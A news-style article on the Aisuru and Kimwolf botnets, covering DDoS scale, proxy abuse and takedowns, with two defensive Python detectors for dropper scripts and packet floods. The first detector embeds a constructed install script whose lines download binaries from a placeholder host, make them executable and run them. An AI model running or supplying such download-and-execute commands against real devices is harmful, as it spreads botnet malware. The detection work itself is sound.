Mirai-Based Botnets Surge: Aisuru-Kimwolf Lead Massive DDoS and Proxy Exploits, Disruptions Challenge Cybersecurity

Mirai-Based Botnets: The Rising Threat of Massive DDoS Attacks and Proxy Abuse

In recent years, the cybersecurity landscape has been increasingly dominated by botnet-driven threats, with Mirai-based botnets at the forefront. First identified in 2016, Mirai targeted Internet of Things (IoT) devices running stripped-down Linux builds on ARC processors. Attackers compromised these devices through known vulnerabilities or default factory credentials that owners often never changed. What began as a tool for Distributed Denial-of-Service (DDoS) attacks has evolved into a vast family of variants, each more sophisticated and destructive than its predecessor.

The Proliferation of Mirai Variants

The public release of Mirai’s source code has led to an explosion of customized versions. According to Spamhaus, there was a 26% increase in botnet command and control (C2) servers in the first half of 2025, followed by another 24% rise between July and December 2025. This surge has positioned the United States ahead of China as the leading host of botnet C2 servers, a title China had held since the third quarter of 2023. This rapid growth underscores the widespread availability of the Mirai codebase and the ease with which cybercriminals can develop new variants.

Aisuru and Kimwolf: The New Titans of DDoS

Among the many Mirai derivatives, Aisuru and Kimwolf have emerged as particularly formidable. Collectively referred to as Aisuru-Kimwolf, these variants have compromised between one and four million devices globally. Cloudflare reports that Aisuru-Kimwolf is responsible for some of the largest DDoS attacks on record, including a staggering 31.4 terabit-per-second flood and a 14.1 billion packet-per-second assault. These figures far surpass the capabilities of earlier Mirai versions, highlighting the escalating danger posed by these botnets.

Commercialization of Botnet Infrastructure

The operators behind Aisuru-Kimwolf have transformed their botnet infrastructure into a lucrative criminal enterprise. They sell access to compromised devices through platforms like Discord and Telegram, enabling other malicious actors to launch attacks or conduct illicit activities. On March 19, 2026, the U.S. Department of Justice announced court-authorized actions to disrupt the C2 servers supporting Aisuru, Kimwolf, JackSkid, and Mossad botnets, with enforcement operations extending to Canada and Germany. Despite these efforts, the botnets have demonstrated resilience, continually adapting to maintain their operations.

Exploitation of Residential Proxy Networks

Beyond orchestrating DDoS attacks, these botnets have been implicated in the abuse of residential proxy networks. By routing malicious traffic through IP addresses assigned to ordinary homeowners, cybercriminals can obfuscate their activities, making detection and attribution significantly more challenging. This tactic not only complicates mitigation efforts but also implicates unsuspecting individuals in cybercriminal activities without their knowledge.

Kimwolf’s Infection Mechanism and Evasion Tactics

Kimwolf, an Android-focused variant of Aisuru, specifically targets mobile devices and Smart TVs. It has infected approximately two million Android devices worldwide, adapting Aisuru's DDoS capabilities for Android systems. The infection process involves executing an install script that downloads `.apk` files from attacker-controlled servers, marks them executable, and runs them one after another, each built for a different CPU architecture so that whichever one matches the device will execute and the malware spreads as widely as possible.
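The download-then-chmod-then-execute sequence repeated once per CPU architecture is a recognisable fingerprint of Mirai-style install scripts. The following detector is an added example written for this article, not code from the researchers or vendors it cites: it scans a captured install script for lines that download a file, make it executable and run it, and counts how many distinct architecture names the script references. The sample scripts, the `dropper.invalid` hostname and the thresholds (two or more dropper lines, or three or more architectures) are constructed for illustration and are not real indicators.

```python
import re
from typing import Dict, List, Set

# Constructed sample of the pattern the article describes: one download,
# chmod and execute per architecture. Hostname and file names are placeholders.
SAMPLE_INSTALL_SCRIPT = """\
#!/bin/sh
cd /tmp
wget http://dropper.invalid/bins/payload.arm7 -O a; chmod +x a; ./a; rm -f a
wget http://dropper.invalid/bins/payload.mips -O a; chmod +x a; ./a; rm -f a
curl -s http://dropper.invalid/bins/payload.x86 -o a; chmod 777 a; ./a; rm -f a
"""

# Constructed benign script: downloads something, but never chmods and runs it,
# and references no CPU architecture names.
BENIGN_SCRIPT = """\
#!/bin/sh
apt-get update && apt-get install -y curl
curl -fsSL https://example.org/app.tar.gz -o /tmp/app.tar.gz
"""

# A line that fetches, marks executable and executes a file in one go.
DOWNLOAD_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
CHMOD_RE = re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b")
EXEC_RE = re.compile(r"(^|[;&|]\s*)\./\S+")

# Architecture names Mirai-family droppers commonly embed in payload names
# (assumed list; extend for your environment).
ARCH_RE = re.compile(
    r"(?<!\w)(arm7?|arm[4-7]|mips(?:el)?|x86(?:_64)?|i[3-6]86|sh4|ppc|m68k|aarch64|sparc)(?!\w)",
    re.IGNORECASE,
)


def analyse_script(text: str) -> Dict[str, object]:
    """Score a shell script for the multi-architecture dropper pattern."""
    dropper_lines: List[int] = []
    arches: Set[str] = set()
    for lineno, line in enumerate(text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue  # comments and the shebang carry no behaviour
        if DOWNLOAD_RE.search(line) and CHMOD_RE.search(line) and EXEC_RE.search(line):
            dropper_lines.append(lineno)
        for match in ARCH_RE.finditer(line):
            arches.add(match.group(1).lower())
    # Assumed thresholds: repeated fetch-chmod-run lines, or a spread of
    # architecture names, is the signal; a single download alone is not.
    suspicious = len(dropper_lines) >= 2 or len(arches) >= 3
    return {
        "suspicious": suspicious,
        "dropper_lines": dropper_lines,
        "architectures": sorted(arches),
    }


if __name__ == "__main__":
    for name, script in (("sample", SAMPLE_INSTALL_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(name, analyse_script(script))
```

The detector deliberately keys on behaviour (fetch, make executable, run, repeat per architecture) rather than on hostnames or file hashes, which the operators rotate freely; it is meant as an input to a sandbox or mail-gateway pipeline, not as a sole verdict, since a legitimate multi-platform installer can produce the same shape.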

Following disruptions by Google and the Department of Justice to the IPIDEA residential proxy infrastructure associated with Kimwolf, reports indicate that the botnet has shifted to The Invisible Internet Project (I2P) to evade detection and maintain its operations. This move underscores the adaptability of these botnets and the ongoing challenges in combating them.

The Evolving Threat Landscape

The evolution of Mirai-based botnets into sophisticated tools for massive DDoS attacks and proxy abuse represents a significant escalation in cyber threats. The ease of access to Mirai’s source code, combined with the lucrative nature of botnet operations, ensures that these threats will continue to evolve. As cybercriminals refine their tactics and expand their reach, it is imperative for individuals, organizations, and governments to enhance their cybersecurity measures. This includes regularly updating and patching devices, changing default credentials, and implementing robust network monitoring to detect and mitigate botnet activities.
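The network-monitoring recommendation above is easiest to act on at the flow level: an infected device taking part in a packet-rate flood shows up as a single source sending an abnormal number of small packets to one destination. The code below is an added example written for this article, not tooling from any of the organisations it mentions. It aggregates NetFlow-style records per source/destination pair and window and flags pairs whose packet rate exceeds a threshold while the average packet size stays tiny; the flow records, addresses, the 60-second window, the 50,000 packets-per-second threshold and the 120-byte size cut-off are all constructed assumptions to be tuned against real baselines.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Flow:
    """One flow record (fields mirror a minimal NetFlow/IPFIX export)."""
    ts: int        # start time, seconds since epoch (constructed)
    src: str
    dst: str
    dport: int
    packets: int
    octets: int


# Constructed sample: three ordinary hosts, one bulk transfer with large
# packets, and one host flooding a single target with tiny packets.
SAMPLE_FLOWS: List[Flow] = [
    Flow(1_700_000_000, "10.0.0.2", "198.51.100.5", 443, packets=1_200, octets=900_000),
    Flow(1_700_000_010, "10.0.0.3", "198.51.100.9", 80, packets=3_000, octets=2_400_000),
    # backup job: high packet rate but full-size packets, should not alert
    Flow(1_700_000_005, "10.0.0.4", "198.51.100.20", 22, packets=3_600_000, octets=5_400_000_000),
    # flood split across two records in the same window
    Flow(1_700_000_000, "10.0.0.7", "203.0.113.10", 443, packets=3_000_000, octets=180_000_000),
    Flow(1_700_000_030, "10.0.0.7", "203.0.113.10", 443, packets=3_000_000, octets=180_000_000),
]


def aggregate_pairs(flows: List[Flow], window_s: int = 60) -> Dict[Tuple[int, str, str], Tuple[int, int]]:
    """Sum packets and octets per (window, src, dst)."""
    totals: Dict[Tuple[int, str, str], Tuple[int, int]] = defaultdict(lambda: (0, 0))
    for f in flows:
        key = (f.ts // window_s, f.src, f.dst)
        pkts, octs = totals[key]
        totals[key] = (pkts + f.packets, octs + f.octets)
    return totals


def find_flood_sources(
    flows: List[Flow],
    window_s: int = 60,
    pps_threshold: float = 50_000,   # assumed: tune to the link's baseline
    max_avg_bytes: float = 120,      # assumed: packet-rate floods use tiny packets
) -> List[Dict[str, object]]:
    """Return (src, dst) pairs whose rate and packet size look like a flood."""
    alerts: List[Dict[str, object]] = []
    for (window, src, dst), (pkts, octs) in aggregate_pairs(flows, window_s).items():
        pps = pkts / window_s
        avg_bytes = octs / pkts if pkts else 0.0
        # Both conditions must hold: a fast transfer of full-size packets is
        # normal bulk traffic, not a flood.
        if pps >= pps_threshold and avg_bytes <= max_avg_bytes:
            alerts.append({
                "window": window, "src": src, "dst": dst,
                "pps": pps, "avg_bytes": avg_bytes,
            })
    return sorted(alerts, key=lambda a: a["pps"], reverse=True)


if __name__ == "__main__":
    for alert in find_flood_sources(SAMPLE_FLOWS):
        print(alert)
```

Requiring both a high packet rate and a small average packet size is what keeps the backup host in the sample from alerting; a production rule would also compare each source against its own history rather than a fixed number, and an alert is a prompt to isolate the device and check its firmware and credentials, which is where the article's patching and default-password advice applies.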

Conclusion

The rise of Mirai-based botnets like Aisuru and Kimwolf highlights the dynamic and escalating nature of cyber threats. Their ability to launch unprecedented DDoS attacks and exploit residential proxy networks poses significant challenges to global cybersecurity. Combating these threats requires a concerted effort from all stakeholders to stay ahead of cybercriminals and protect the integrity of digital infrastructures.